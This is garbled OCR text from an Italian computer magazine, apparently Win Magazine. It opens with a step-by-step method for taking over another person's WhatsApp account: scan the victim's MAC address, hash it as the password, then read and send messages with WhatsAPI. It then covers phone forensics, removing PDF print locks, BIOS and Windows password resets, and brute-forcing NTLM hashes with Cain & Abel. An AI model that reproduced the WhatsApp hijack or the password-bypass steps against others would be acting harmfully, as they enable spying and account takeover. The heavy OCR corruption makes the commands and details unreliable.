così casuale come sembra: essa viene calcolata mediante un'operazione di 
reverse engineering del M AC Add i ess Wi-Fi del cellulare, odirettamente del 
codiceJMEt. Quindi, se qualcuno riustisseascopri re l'indirizzo fisicodella 
scheda di rete (bastano una distro I inuxeunnscannerdi rete come Nmap) 
potrebbe far credere ai server d i WhatsApp d i essere u n'a It rn persona e leg¬ 
gere oscriveie messaggi al postosuo. Quella che vedremo èovviamenteuna 
pratica illegale, da non provare per non incorrere in guai seri con la giustizia! 
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MD5 gencrutor - Calmiate MI)5 for the tvp 


I dati prima di tutto 

B ll primo passo che compie il pirata è quello 
di recuperare l'indirizzo fisico della scheda 
di rete Wi-Fi: per farlo può connettersi da 
PC ad una rete pubblica e con programmi come 
NMAP o Autoscan effettua una scansione per indi¬ 
viduare le periler ictie e annotarsi i loro MAC Address. 
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Un do’ di calcoli 

H Se il malintenzionato vuole leggere i mes¬ 
saggi di una persona che conosce gli chie¬ 
de di connettersi alla sua rate, riuscendo 
cosi ad annotarsi il MAC Address. Ottenuto IIP, lo 
digita sul sito www.winmagazine.it/link/1810 per 
convertirìo ria ASCII a codifica MD5. 


la falla nel sistema 


a ll pirata si collega a: https://r .whatsapp.net/ 
Ivi /exist.php'>cc=$countrycode&i n- $pho 
nenumber&i)riid=$password digitando 39 
in countrycode e il numero di telefono dell'utente 
agosto di phonenumber. In password, sostituisce 
quello recuperato al passo precedente. 





L’applicazione soia 

B Verificata la vulnerabilità nello smartphone 
della vitiima, il pirata scarica, dopo una 
breve ncerca oppure scovandolo su qualche 
sito di file hosting, il programma WhatsAPI che gli 
permetterà dì sbirciare tra i messaggi privati di 
WhatsApp in maniera abbastanza semplice 


Cambio di identità ! 

Il pirata si sposta quindi nella cartella Test 
di WhatAPI e con un editor di testò apre il 
file whatsapp.php. Quindi ne modifica il 
contenuto inserendo i dati che ha ottenuto nei pas 
si precedenti: Snickname - “WhatsAPI Test"; 
$sender- ‘mmero_tcT;$mci- " MBB:CC:DD:EE:FF . 


La spia in azione 

0 Per leggere i messaggi della vitiima il pira¬ 
ta digita da Terminale il comando php 
whatsapp.php -inumeròdi telefono, men¬ 
tre se vuole inviare un SMS fingendosi la persona 
spiata digiterà php whatsapp.php -s “numero di 
cellulare ricevente ” “testo del messaggio '. 
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Recupero dati 


per cellulare 

Quando tutto sembra perduto 
chiediamo aiuto al PC per 
ripristinare rubrica, SMS, dati... 


Cosaci 

occorre 
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C ellulari e smartphone sono dispositivi 
tecnologici che fanno parte ormai della 
nostra vita quotidiana e che utilizziamo 
per gli usi piti disparati. Ci permettono infatti 
non solo di scambiare messaggi di testo ed ef¬ 
fettuare o ricevere chiamate audio e video, ma 
anche di scattare foto, registrare video, navi¬ 
gare su Internet in mobilità, chattare, postare 
contenuti multimediali sui social network e 
molto a ltro ancora. Possono essere considerati 
quindi una sorta di "scatola nera" delle nostre 
attività quotidiane, dal momento che nella loro 
memoria interna è conservata una miniera di 
filenersonali. Grazie ad alcune tecniche usate 
dagli esperti di Mobile ForQnsics (in campo 
investigativo, èia scienza che si occupa di recu¬ 
perare prove da dispositivi mobili) è possibile 
effettuatemi backup dei dati memorizzati negli 
smartphone e ciò può essere particolarmente 
utileper prevenire eventuali malfunzionamenti 
del dispositivo stesso oppure per recuperare 
qualsiasi fi le importante ospitato dalla sua me¬ 
moria. li principale strumento utilizzato per 
entrare nel cuore dei telefoni Android o Apple 
ed effettuare un backup dei dati memorizzati 
al loro interno è Deft 7, una distribuzione Linux 
che contiene tutti gli strumenti del caso per 
effettuare un'accurata analisi dei contenuti 
e recuperare anche file cancellati o nascosti. 


Occhio al cellulare! 

Le tecniche illustrate in questo tutorial, però, 
possono essere utilizzate anche da malinten¬ 
zionati che eventualmente dovessero entrare in 
possesso del nostro smartphone Da un cellulare 
altrui un qualunque sconosciuto può recupe¬ 
rare non solo foto, video e altri dati legati alla 
nostra privacy, ma anche la password di accesso 
a Facebook o alFaccount di posta elettronica, il 
consiglio è pertanto quello di fare molta atten¬ 
zione a dove riportiamo il cellulare, evita ndo in 
ogni caso di lasciarlo incustodito. 
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3 Analisi di un cellulare Android 


Vediamo come creare una pendrive awiabile con Deft 7, la distribuzione Linux che consente di entrare nel cuore 
di uno smartphone dotato del sistema operativo targato Google ed effettuarne un backup dei dati. 



^ Eseguiamo il software ^ La ISO dell a distribuzione 

■J Scompattiamo il file UNetbootin.zip 2 Nell'interfaccia principale del programma 

w* che troviamo sul CD-ROM, facciamo selezioniamo Immagina disco, quindi clic 

doppio clic sui file unetbootm-windows-575. chiamo sul pulsante Sfoglia a destra per raggiun- 
exe per avviare II programma Clidehiamo sul gere il percorso nel quale e salvata l'immagine di 

tasto Si quando compare il messaggio di rjm- Deft 7 che abbiamo scaricato da Win Extra Con¬ 
so dell'LIAC. ’ Ar MA fermiamo con un clic su Apri 



* Avviamo la distribuzione 

4 Colleghiamo la pendrive avviabile conte- 
: nente Deft 7 ad un ingresso USB disponi¬ 
bile sul PC ed avviamone il Pool. Quando appare 
il boni manager della distribuzione, selezioniamo 
la lingua italiana, poi Deft Linux UVE e premiamo 
Invio. Attendiamo quindi il caricamento dell’OS. 



^ Meglio usare la GUI 

g Di default, Deft 7 si avvia priva di interfac¬ 
cia grafica. Per rendere ogni operazione più 
agevole e di sicuro alla portata anche dell'mente 
meno esperto, digitiamo nella shell deft-guie con 
fermiamo con Invio. Dopo qualche secondo l'in¬ 
terfaccia grafica della distribuzione viene cannata 



^ La pendrive ora è pronta! 

2 Colleghiamo a questo punto la pendrive 
ad un ingresso USB disponibile nel com¬ 
puter e selezioniamola dal menu a tendina Unità 
presente nell interfaccia principale di UNetbootin 
Avviamo la creazione del sistema operativo live 
con un clic su OK 



Ecco il me nu dei software 

g | Non appena Deft 7 sarà pronta all uso, 
clrcchiamo sul pulsante di menu presente 
in basso a sinistra e spostiamoci in DEFT/Mobile 
Forensics qui sono raccolti tutti i software Inte¬ 
grati nella distribuzione fondamentali per l'analisi 
di un telefonino. Cucchiamo su BitPim 



* Il telefonino è connes so 

y § Prima di analizzare il telefono connesso alla 
porta USB del PC e necessario procedere 
alla sua configurazione. Cucchiamo su import Data 
e seguiamo la procedura guidata per il riconosci¬ 
mento del dispositivo collegato al PC Compiliamo 
campi richiesti e confermiamo con Next. 


^ Cosa vogliamo importare? 

g Al termine della procedura guidata, pos 
siamo cliccare su Gel Data from'Phone e 
da qui selezionare il tipo di risorsa da importare, 
Fra questi troviamo gli SMS. la rubrica e qualsiasi 
altra tipologia di dati memorizzatili su un termi¬ 
nale. Confermiamo con un clic sul pulsante OK 


* L’anali si è completata 

Q La durata del processo di importazione 

varia in base alla quantità di dati memoriz¬ 
zati sul dispositivo. Al termine, possiamo spostarci 
fra i vari tab disponibili (. Calendar .; SMS. Phone- 
Bookecc.) per analizzare tutto il contenuto che il 
software è riuscito ad acquisire. 
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13 L’iPhone sotto la lente 


Servendoci dei tool integrati nella distribuzione Deft 7 possiamo analizzare il backup del contenuto della memoria 
di un qualsiasi smartphone Apple. Ecco come procedere e quale software utilizzare. 




^ Un tool per detective 

1 


Dopo aver avviato la nostra copia di Deft 7, clicchiamo sul pulsante 
menu presente in basso a sinistra dell’interfaccia grafica e raggiungia- 


Carichiamo il backup 

2 A questo punto, raggiungiamo la directory nella quale abitiamo memo 
rizzato il backup del meiafonino. IMon ci resta dunque che confermare 



-a Un software alternativo 

3 I Un altro tool, interamente a riga di comando, che possiamo utilizzare 
—• : per mettere sotto la lente un qualsiasi iPfione e Iphone Backup Analy¬ 
zer Avviamolo da! menu Mobile Forensics (presente in DEFT). Per conoscere 
i comandi disponibili digitiamo iphone -backup-analyzer -h. 


+ Il backup è servito! 

4 ì Se vogliamo ad esempio analizzare un backup di un meiafonino dota- 
— to di sistema operativo iOS 4, digitiamo il comando iphone-backup- 
analyzer -ó/bome/directory_del_backup -4 e confermiamo con Invio. Non 
ci resta che analizzare il risultato restituito! 


SCOPRIRE i SEGRETI NASCOSTI NEL PC 


'Computer Forensics' è la scienza che riveste un 
ruolo importante nelle investigazioni informati¬ 
che che si svolgono su molte scene del crimine. 
Giusto per fare un esempio, nella memoria del 
computer si può infatti celare la cronologia di 
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•terreni Enwjrehng element is he«ig roveri ». 
etanent bemg btcught to an abrupt stop, in Test el 
Seme 47 Matched 1 


Unaikicated clutter (ditk c:) LCN Rarge. 204231 

IO Type LibraryW ersFvents IntertaceS £vent{ 
>1 ogonllser Merlare WW Get thè narri»! user sHti 
Score 33 Matched I 

Unallocated clutter (disk et) LCN Rarge: 204S7I 

&gxred Indicales that password has e*pired A 
EhsaWed Home Oir Requtred Lóckout Password H 
Score 30 Malched I 


una chat nella quale la vittima di un omicidio si 
è confidata col suo assassino. A tal proposito, nel 
tutorial pubblicato nell articolo abbiamo fatto 
vedere come utilizzare OSForensics, un software 
che integra tutti gli strumenti necessari per effet 
tua re una vera e propria indagine forense su un 
computer e scoprire i segreti nascosti da chi lo 
utilizza. È cosi possibile andare alla ricerca di tutte 
le mali archiviate sul disco rigido, anche quelle 
cancellate, scoprire il numero di accessi effettuati 
al PC e altre informazioni sulle attività compiute 
dall'utente su Internet, come il browser utilizzato, 
i siti più visitati, i download effettuati e i log delle 
chat. Ma non finisce qui. Grazie a questo potente 
tool è possibile anche recuperare i file eliminati 
dal disco rigido e tutte le password celate nel 



sistema. Seguendo i trucchi e le procedure passo 
passo descritte nell'articolo, anche noi possiamo 
trasformarci in provetti esperti di Computer Fo¬ 
rensics ed effettuare un veloce controllo sul nostro 
stesso computer. Scopriremo che, servendosi delle 
tecniche e degli strumenti giusti, agli investigatori 
informatici non sfugge davvero nulla! ■ 




76 Win Maqaane Speciali 



































[ Una risposta a tutto 



Documenti PDF senza blocchi 

-/ Perché non riesco a copiare il contenuto di alcuni 
documenti archiviati in formato PDF? 

S Si può aggirare il blocco della stampa di questi file? 


SERVE A CHI... 

... non ricorda più la password dei file 
PDF e cerca un modo che gii permetta 
comunque di stamparne o copiarne 
il contenuto 


T ra le caratteristiche che hanno reso tanto 
diffusi i PDF (Portatile Documents Format) 
la versatilità è quella che li ha trasformati nel 
formato ideale per la pubblicazione di docu¬ 
menti. Sviluppato da Adobe, la stessa azienda 
che sta dietro Photoshop e Flash Player, il for¬ 
mato PDF è Vunico \v\ grado di assicurare \a 
perfetta compatibilità con qualsiasi sistema 
operativo. Infatti, a differenza di altri formati, 
i documenti PDF preservano la formattazione 
originale indipendentemente dalla piattafor¬ 
ma o dal dispositivo utilizzato per leggerli. Ciò 
significa che creando un documento PDF su un 
PC Windows abbia mo la certezza che il layout 
resterà invariato, anche se il documento sarà 
visualizzato su macchine (computer, smart¬ 
phone e tablet) equipaggiate con un sistema 
operativo differente e, di conseguenza, anche 
la loro stampa garantirà risultati identici a quelli 
voluti dal creatore del documento stesso. 


PDF sotto chiave 

Per proteggere le informazioni contenute nei 
documenti PDF, coloro che licreano hanno la 
facoltà di inibire Tatti vazione di funzioni come 
la copia del testo o la stampa delle pagine, ren 
dendole possibili solo inserendo la password 
di sblocco. Senza la relativa chiave di sicurezza 
potremo quindi solo visualizzare il documento, 
ed è inutile ricordare che aggirare la protezione, 
proprio come nel caso di CD, DVD e Blu-ray, è 
jUp reato se non siamo i legittimi proprietari 
dèi «documento PDF. Tuttavia, se siamo noi i 
proprietari del documento e non ricordiamo 
piu\à password d\ sblocco, è bene sapere che 
è possibile superare questa limitazione e che 
tra l'altro l'operazione è del tutto legittima. La 
Rete offre diversi strumenti on -line in grado di 
rimuovere la protezione dai dnairnentffDF, ma 
insieme a risultati non sempre soddisfacenti 
e a lunghi tempi di attesa, solitamente itool 
impongono restringenti limiti alla dimensione 
dei file caricati Avvalendoci invece della combi¬ 
nazione di GSview e GhostScript due software 
gratuiti che svolgono funzioni di conversione 
dei linguaggi utilizzati nella creazione dei PDF, 
l'operazione di sblocco delle funzionalità di 
stampa dei documenti protetti sarà immediata. 


Inoltre, non ci sono limiti nella dimensione 
del file e la stampa rispetterà il layout origina¬ 
le. Installati entrambi i software (rispettando 
l'architettura del nostro sistema operativo) e 
lanciando l'interfaccia grafica di GSview, che 
ricorda molto quella dei classici visualizzatori 
come Adobe Reader, i documenti importati 
nell'area di lavoro potranno essere stampati, 
anche se sono protetti da password, e se ne 
potrà copiare il contenuto ed incollarlo in un 
nuovo documento. 

GSVIEW E GHOSTSCRIPT 

-.V • CO ROM 


COME PROTEGGERE I NOSTRI PDF 

Oltre a installare una stampante virtuale con cu ara -rb*e 

convertirefiledi testo e documenti di MS Office m tornato 
PDF, il tool Doro PDF Writw(www.winmagarinp .it/lmk . h) 
fornisce gli strumenti per impedirne, ricorrendo a una pas 
sword, la stampa e la copia del loro contenuto. Dodo aver 
Installato Doro PDF Writer, lanciando la stampa di un docu 
mento MS Office, PDF, unè -mail o una pag Ina Web e avviando 
la stampa seledonando l'omonima stampante virtuale, nel 
tab Emryption troveremo gli strumenti per proteggere il 
documento, la password che sblocca il documento va inserita 
nella casella User pai* word fot Imitedaccea, mentre rimuo¬ 
vendo la spunta da entrambe le caselle, il PDF che otterremo 
(ficcando su Create, non potrà essere copiato o stampata 


Stampare e copiare il contenuto di documenti PDF protetti da password 





Estraiamo gli archivi GhostScript.zip e 
G5 view.zip ed eseguiamoli file js905w32. 
exe \js905w64.exe se l'architettura del sistema 
è a 64 bit). Proseguiamo semplicemente cuc¬ 
cando su Next, I Agree e Instali e chiudiamo 
con Finish. 


2 Eseguiamo anche il file gsv50w32.exe (o 
gsv50w64.exe ) e cicchiamo Setup. Cuc¬ 
chiamo Italiano, proseguiamo con Success/Ver 
ultimiamo con Fine, quindi avviamo GSview 
dall'omonimo collegamento presente nel menu 
Start/Tutti i programmi/Ghostgum. 


3 Cicchiamo OK nella finestra di registrazio¬ 
ne, trasciniamo il documento PDF protet¬ 
to nell'area di lavoro e utilizziamo l'apposito 
pulsante (o il tasto P) per stamparlo. Se invece 
facciamo clic su Modifica, avremo accesso a 
diversi comandi utili per la copia del contenuto. 
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| tl disco sblocca password | 


V r v Investigatore informatico 



Cosa ci rs 

occorre 

TOOL RECUPERO 
PASSWORD BIOS 

CMOSPWD 

Sira tntempt: 

www.cgsecurltyorg 


■l recupero 

vundows 

MICROSOFT» 
WINDOWS 7 
ULTIMATE 

Otianto cesia'? 

Sito Internet: • 

wwwrwcrosott.it 

UISTR UMORE LINUX 

UBU NID11.04 
DESKTOP 
EDITI ON 

co 

Silvi Internet 

wvcjy.ubuntu.it 

SOFTWARE DI 
BRUTE FORCE 

CAIN & ABEL 

co 

OBBBBflliP 

Sito Internet: 

www.oxifl.it 


D iciamoci pure la verità: l'esigenza di difen¬ 
dere a denti stretti la nostra privacy, ci ha 
costretto a ricordare a memoria decine di 
password ognuna diversa dall’altra c necessarie 
all'accesso a questo o a quel servizio. Magari, 
per aumentare il grado d i sicurezza del PC, ol 
tre alla classica chiave di accesso di Windows, 
ne abbiamo configurata anche una nel BIOS, 
ovviamente differente da quella del sistema 
operativo. E se in tutto ciò la nostra memoria 
non è poi così di ferro, abbiamo creato i! giu 
sto mix per rendere inutilizzabile il PC. inizia 
proprio ora la disperata ricerca della password 
Corretta, provando innumerevoli combinazioni 
pei cercate disperata meri le di,accedere ai nostri 
preziosissimi file. Alle volte basta solo qualche 
tentativo per far ritornare tutto alla normalità: 
ma se la fortuna sembra averci già girato le spal¬ 
le, non c'è comunque da temerei 

Lo scova password 

Alcuni potrebbero pensare che l'unica solu 
zione fattibile sia quella di procedere ad una 
secca formattazione o, nel caso di una pas¬ 
sword dei BIOS, addirittura alla sostituzione 
della scheda madre! Ma, fortunatamente, 
non è così: utilizzando infatti i giusti ferri 
del mestiere, possiamo improvvisarci tec¬ 
nici informatici e scardinare qualsiasi tipo 
di protezione che blinda il nostro PC, dalla 
chiave di accesso a Windows, alla password 
del BIOS, fino ad arrivare a quella di MSN 
o di Outlook. E quando la situazione si fa 
davvero complicata, basta creare una pen- 
drive "magica 1 ' da tenere sempre a portata 
di mano, pronta ad essere inserita nel PC per 
recuperare tutti i dati più importanti. Vedia¬ 
mo dunque come procedere, analizzando 
le mosse da compiere in ogni sìngolo caso: 
solo cosi potremo risolvere i nostri problemi 
e magari dedicare un po’ di tempo in più per 
allenare la nostra memoria! 


sblocca 
assword 

Non riesci ad accedere al PC 
e ad avviare Windows? Così 
recuperi i dati archiviati su disco 











Il disco sblocca password 


Investigatore informatico 0 


Ecco la password del BIOS 

Una password di accesso al BIOS evita che qualcuno possa apportare modifiche al sistema. 
Ma se dovessimo dimenticarla, sarebbe impossibile accedere al PC. Ecco come recuperarla. 




Via la batteria! 

"j | li metodo piu semplice che permette di resettare la password 
—/ del BIOS consiste nella rimozione della batteria inserita nella 
scheda madre. Verifichiamo dunque che il PC * spento e smontiamo 
lo sportello laterale dei case HimixwiamclwoattR Éner almeno 30 
minuti e verifichiamo che il nostro obiettivo siasfc 



Master password listing 


Thor ve jbw w>n to bju v w Dir BC5 wlr n fra ndn* rxm mi frti «n ivwt v d toc rrib tra f 
meteo* or »«» svoer-c* rumane #?£ ymt&CS VMtmMeowlM a p pv o pn u vtr r>jr otuttm 

O* yw taipt vom ROS vmvHxf 1 Cart yai q* tctm t> * vrrtr^r »h rtmr 1» fw » g? team te 

ftUfmwP rn»**v*pTAfliFy»»a»ar «wnvew of*ikMM»*MI nKWfMwo’ifc tHwwnt'ik 
barn eorrpM ter* Mvett aito net and « «sre» 


AMrcriM^rMn 


a II giusto iumper 

2 Alcune schede madri non consentono la rimozione della bat- 
«J iena. In questi casi possiamo procedere alte riprogrammazio- 
ne del BIOS (che cancella la passvuord] tramite lo spostamento di un 
jumper. In questo caso, ci tocca dare uno sguardo al manuale della 
nostra motherboaro per identificare il giusto ponticello 




IN CASI ESTREMI, 
ESTREMI RIMEDIÒ 


Nel caro in cui nessuno 
dei metodi analizzati 
nel Macropasso di fianco 
consente di resettare la 
password del BIOS, cosa 
farepercercaredlre 
cuperare i dati presenti 
net nostro hard disk? 
Come ultima spiaggia, 
potremo pur sempre 
decidere di procedere 
alla aia rimozione fisica 
per inserirlo in un altro 
PC: il disco verrebbe 
riconosciuto come una 
normale unità di archi¬ 
viazione aggiuntiva e 
potremo quindi effet 
tuare un backup di tutti 
itile che riteniamo più 
importanti. 


.a. La password standard 

J Molti produttori inseriscono nel BIOS la cosiddetta Master 
Password, una chiave che consente ai tecnici di accedere al 
PC bypassando eventuali chiavi di accesso impostate dagli utenti Per 
conoscere l’elenco contenente le principali password, è sufficiente 
ooilegarci alla pagina Web vww.winmagazine.it/link/795. 


* C’è anche un tool... 

4 1 Se il PC è già avviato, possiamo affidarci a CMOSPwd. Avvia¬ 
mo i Prompt dei comandi con diritti di amministrazione e 
raggiungiamo la cartella Windows contenuta nell'archivio del softwa¬ 
re Digitiamo ioperm -/epremiamo Invio Digitiamo cmospwd_win 
/k. premiamo Inme selezioniamo 2 Confermiamo con Invio. 


QUANDO IL BIOS NON CEDE AGLI ATTACCHI 


Alcuni tipi di BIOS installati sulle schede madri in 
circolazione sembrano essere davvero blindati. Ma 
è tutta apparenza! Quando proprio nessun metodo 
sembra essere quello giusto per scardinare la chiave 
d i accesso che proprio non riusciamo a ricorda re entra 



in gioco PC CMOS Cleaner, l'utility compatibile con 
la maggior parte delle motherboard attualmente 
in commercio. Per metterlo alla prova ci basta rag¬ 
giungere il sito Web www.winmagazinejt/link/1066 
e procedere al download dell'immagine in formato 
ISO. Al termine, non ci resta che masterizzarla su un 
CD Rom vergine (con Nero Burning Rom basta clic 
care su Masterizzatore/Scriviimmagine e seguire 
la procedura guidata! per esegui re poi un riawio del 
PC con successivo boot dal lettore ottico. 

Dobbiamo solo sperane che l'attuale configurazione 
del BIOS consenta il boot da periferiche esterne in ’ 
quanto, essendoci installata una password, non sarà 
possibile accedervi ed eventualmente abilitarlo. Se 
siamo dunque fortunati, non ci resta che seguire la 



semplice procedura guidata: PC CMOS Cleaner con¬ 
sente di cancellare ogni possibile password precedere 
temente memorizzata riportando alle impostazioni di 
fabbrica il BIOS dei la nostra scheda madre. Ripristinare 
il PC sara un vero e proprio gioco da ragazzi! 
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UN AIUTO 
DALL'ALTO 

Se la memoria non è il 
nostro punto forte, per 
evitare di eseguire il ri¬ 
pristino della password 
di Windows possiamo 
pur sempre impostare 
una domanda di aiuto 
she ci consenta di ricor¬ 
dare la (Mare di accesso 
ogniqualvolta saia 
necessario. Accediamo 
alla seihneJkfmmt 
utente del Pannello di 
rvntroffodi Windows e 
selezioniamo l'opzione 
Modifica password. 
Inseriamo quella che 
preferiamo e comple¬ 
tiamo tutti i campi, 
incluso Suf perimento 
pois word. Conferma 
mo quindi con Cambio 
password. Qualora do¬ 
vessimo dimenticarla, 
infasidiloginal siste¬ 
ma Windows ci proporrà 
il suggerimento preim 
postato per aiutarci a 
ricordarla. 


Password nuova per l’OS 

Se la chiave di accesso al sistema operativo proprio non ci viene più in mente, non resta che 
resettarla e crearne una nuova usando un semplice tool integrato nell’OS: ecco come procedere! 



> # CurrtMUf 

.* xtCV.CiJkUtSJtOOt 

- ji HtfV.CJRNFWT 
a u H«V_L0c>i.M»O»4 
M 9CMOOOOX* 

Jp -AWCWaK 

». USI/ 

*. XCUMFV 
k iorn uam 
y k MtlM 
: 4, UStM 

ir '♦fr CJWfKT.CO#t« 


a t Quest ione di chiavi 

2 ! Verrà creata una nuova chiave che chiameremo reset 
: Selezioniamo HKEY_LOCAL_MACHINEireset\Setup e con 
un doppio clic su Setup!ype assegniamole il valere 2 Cicchiamo 
CmdLine impostando cmù.exe com valore. Selezioniamo HKEY_ 
LOCAL_MACHINE\reset e cicchiamo Scarica hive in File. 



^ Ripristino di Windows 

“J = Inseriamo il DVD d installazione di Windows 7 e impostiamo 
•—* il BIOS per eseguire il boot da questa unità (l’operazione varia 
ut base al bptMji scheda madre!. Proseguiamo con la procedura gui¬ 
data come swpfrpno installare il sistema operativo. Nella finestra 
installa selezioniamo /waatim il computer e premiamo A venti 



^ Nel re gistro di sistema 

2 Clicchiamo Erompi dei emanai e digitiamo regedit seguilo 
w da Invio Attendarne l'avvio dell'editor del registro di sistema 
e individuiamo la chiave HKEY LOCAL MACHINE Cicchiamo su 
Carica hive presente nel menu File e selezioniamo il valore SYSTEM 
presente in C:Windows\System32\config. Confermiamo con Apri 


Amministrate**; cmd&e 


ici*osol t l/indowr. (Uersiofie 6.1.76001 

opyrifTht <c> 2009 Microsoft Corporation. lutti i 

:\Windows\sy3ten32>regedit 

:\Wlndows\systen32>net user U inceri so qworty 


i 


a La nuova password 

£ : Ravviamo il PC e attendiamo l’avvio del Prompt dei comandi. 

Digitiamo net userseguito dà nome utente e dalla password 
da impostare. Qualora lo usemame fosse composto da più parole, 
racchiudiamolo tra virgolette. Confermiamo con Invio e ravviamo il 
computer per verificare che tutto sa andato per il verso giusto. 


UN DISCHETTO "SALVA PASSWORD" 


Preoccupati di dimenticare la password di accesso a 
Windows? Pei reagire ad un’evenienza slmile possiamo 
creare un disco per reimpostare la chiave d'accesso in 
automatico. Inseriamo un floppy disteoconnettiamo 
una pendrivead una porta USB libera del computer. 
Andiamo in Account utente e facciamo clic sulla voce 
Crea un disco di reimpostazione password, nella 
barra dei menu a sinistra. Nella finestra del wizard 
che appare cicchiamo su Next. 

Aquesto ppnto, selezioniamo il supporto di memoria, 
tra quelli disponibili nel menu a tendina: se abbiamo 
connesso diverse pendrive o altri supporti USB al 
computer, facciamo attenzione a selezionare quello 
giusto. Cucchiamo ancora su Next per procedere oltre. 
Di gitia mo la password del faccount educhiamo Next. 


anche nella schermata successiva.Quindi premiamo 
Fine per terminare. Il disco “salva password" è pronto: 
teniamolo al sicuro (chiunque disponga del disco 
potrebbe accedere al nostro account) per usarlo nei 
casi di emergenza! 
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1 La chiavetta salvavita! 

Quando la password di Windows è difficile da trovare basta una mini distribuzione Linux 
installata su pendrive per recuperare tutti i nostri dati archiviati nell’hard disk. 
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Scarica Ubuntu 
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1 


Il software fondamentale 

Andiamo nella sezione Utilità&Programmazione del CD- 
Rom per trovare l'ultima nelease disponibile di Jnetoootn 
e salviamo il file unetbmtin.zip su disco Questo software tra¬ 
sformerà una comune pendrive USf#i jjp sistema Linux avvia 
bile all’occorrenza. 




a La pendrive prende forma 

0 Avviamo Unetbootin e selezioniamo l'opzione Immagine 
disco. Premiamo su Sfoglia e raggiungiamo l'immagine 
di Jbuntu che abbiamo scaricato al passo precedente Selezio¬ 
niamo da Unità la lettera associata alla pendrive inserita nel PC e 
confermiamo con OK. Tutti i dati memorizzati nella chiavetta ver¬ 
ranno cancellati! 


* Sce g l iamo la distribuzione 

2 ! È il momento di scegliere quale distiibuzione Liiijk instai 
are sulla nostra chiavetta USB Per semplicità d'uso e sta 
biiità affidiamoci ad (Jbuntu. Raggiungiamo quindi la pagina Web 
vwAw.ubuntiut e spostiamoci in Ctoirwtoatf presente nel menu Sco¬ 
pri Ubunlu. Confermiamo con un de su Avvia Doivnloati 



a L’avvio d a USB 

/J Terminata l’operazione (che può rchieder^iarecchi minu- 
-—J ti) ravviamo il PC e accediamo al BIOS (premendo Cane 
prima che appaia il bgo di Windows) per impostare il boni ria USB: 
l'operazione vana in base al tipo di scheda madre in uso. Non 
rimane che attendere qualche minuto prima di visualizzare l'in¬ 
terfaccia di Ubuntu. 


~ 7ED6F881D6F86BJ3 

File Modifica Visualizza Va: 

Segnallbri Aiuto 

indietro » 

"»? Avriffi 

t«e « * ■ 

Risorse 

- X 

* i 0^11* System da 268 CI 

# vincen/o 

M Scrivania 
) File System 


BMWMIChallenge 



-** Alla ricerca d el file perduto 

Jj | Cucchiamo quindi su Risorse presente nella barra in alto 
e successivamente su Home per accedere al gestore file 
integrate in Ubuntu Nella tabella a sinistra del monitor vengono 
visualizzate tutte le risorse del PC: Individuiamo il nostro hard disk 
(ad esempio File System da 258 GB) e dcchiamoci su per esplo¬ 
rarne il contenuto 


^ Copia in corso! 

g ; Raggiungiamo il percorso nel quale sono salvati tutti 
- ; nostri dati più importanti (ad esempio, la cartella Docu¬ 
menti o il Desktop Selezioniamo quelli che desidenamo saiva¬ 
re e con un clic destro selezioniamo l'opzione Copia Possiamo 
quindi incollarli in una seconda penrinve o su un hard disk ester¬ 
no collegati al PC. 


4 



LE DIMENSIONI 
CONTANO! 

Unetbootin è in grado 
di creare una perfetta 
copia live da USB di 
qualsiasi distribuzione 
Linux. Occhio, però, alle 
dimensioni: per dar vita 
ad una pendrive conte¬ 
nente Ubuntu è sempre 
bene sceglierne una che 
abbia una capacità di 
almeno 2 GB. Nel caso 
in cui fossimo disposti 
a sacrificarne una di 
dimensioni inferiori, af¬ 
fidiamoci a mini distro 
delcalibrodiPuppyLi 
nux (www.puppylinux. 
org), che comunque 
risultano più che suffi¬ 
cienti per raggiungere il 
nostro obiettivo. Anche 
l'utilizzo è molto sem 
pKce, soprattutto se 
ci limitiamo ad opera¬ 
zione di copia e incolla 
di dati. 


► 
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v Investigatore informatico 


Il disco sblocca password | 


3 Quando il gioco si fa duro 


Se oltre alla password di accesso a Windows vogliamo recuperare quelle utilizzate dagli altri software installati 
nel PC, non ci rimane altro da fare che sferrare un attacco di tipo brute force con Cain & Abel. 



^ Installazione in corso 


^ Servono dei driver 



•I Poma di poter recuperare tutte le nostre pas- 
■ swortì, installiamo dal CD-Rom il tool Cain & 
Abel. 0 basta effettuare un doppio clic sid file ca 
setup.exe confermiamo quindi con Cons< 
seguiamo con I installazione guidata diocari 
sul pulsante Next. 


sunne ca 

isant/apro 

indoaeinpn 


O ; Completiamo l'installazione fino a raggiungere 
‘ il pulsante Finisti Altroché Cam 6 Abel 'unzioni 
correttamente, è necessario che nel PC siano installati 
particolari driver per la scheda di rete. Verifichiamo che 
l'opzione Automaùcaily start thè WinPcap driver ai 
ttime sia attiva. 


ira i opzione ahi 
boottimesz 


Si entra in azione! 

A A questo punto, possiamo linaimenie awia- 
re Cain & Aùel, la cui esecuzione necessita 
dei privilegi di amministratore. Cliochiamo dunque con 
I tasto destro del mouse sull'icona del software nei 
menu Start e selezioniamo l'opzione Esegui come 
amministratore. Confermiamo con un clic su Si 


^ La rete non serve 

K ; Se nel nostro PC è attivo un qualsiasi firewall 
(ad esempio quello di Windows) il software 
restituisce un messaggio che ci inlorma circa l’im¬ 
possibilità di utilizzare alcune funzioni integrate. Poi¬ 
ché nel nostro caso non sono necessarie ignoriamolo 
e continuiamo cliccando su OK. 


* L’avvio è autom atico 

Q . Cosi facendo i driver necessari al corretto tun- 
.... zionamento di Cain & Abel partiranno automa¬ 
ticamente ad ogni avvio di Windows. Confermiamo 
quindi con un clic sul pulsante Instali c attendiamo 
pochi secondi che anche la procedura d’installazione 
dei driver di rete venga completata 
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menu è Quello gi usto 

0 Spostiamoci dunque nella scheda Cracker 
(presente neirinterfaccia principale del sof¬ 
tware) e selezioniamo uno degli elementi contraddi¬ 
stinti con il Ingo di Windows: per provare a recuperare 
la password di accesso al sistema operativo, selezio 
niamo la voce LJW & NTLM Hashes. 





.k Ricerca d egli a ccoun t 

y Aioli ornane che cliccare sul pulsante + (nel 
... - menu in aito nell'Interfaccia principale di Cain 
& Abel) e selezionare l'opzione Import Hashes from 
locai System . Confermiamo con un clic sul pulsante 
/Vexfper dare il via ai nostro ‘ attacco" baite force alla 
ricerca Osila password perduta. 


Quale chiave scovare? 

Q ; Tutte le password presenti nel sistema (uten 
ti di Windows o chiavi di accesso a softwa¬ 
re) vengono velocemente identificate da Cain & Abel. 
Selezioniamo con il tasto destro del mouse quella che 
desideriamo recuperare e raggiungiamo opzione 
NTLM Hashes dal menu Brute-Force Attack. 


▲ Ecc o la password! 

Q Abilitiamo l'opzione Predefmed per utilizzare 
ZJ un classico set Oi caratteri alfanumerici- Nella 
sezione Password Lenght impostami) poi la lunghez¬ 
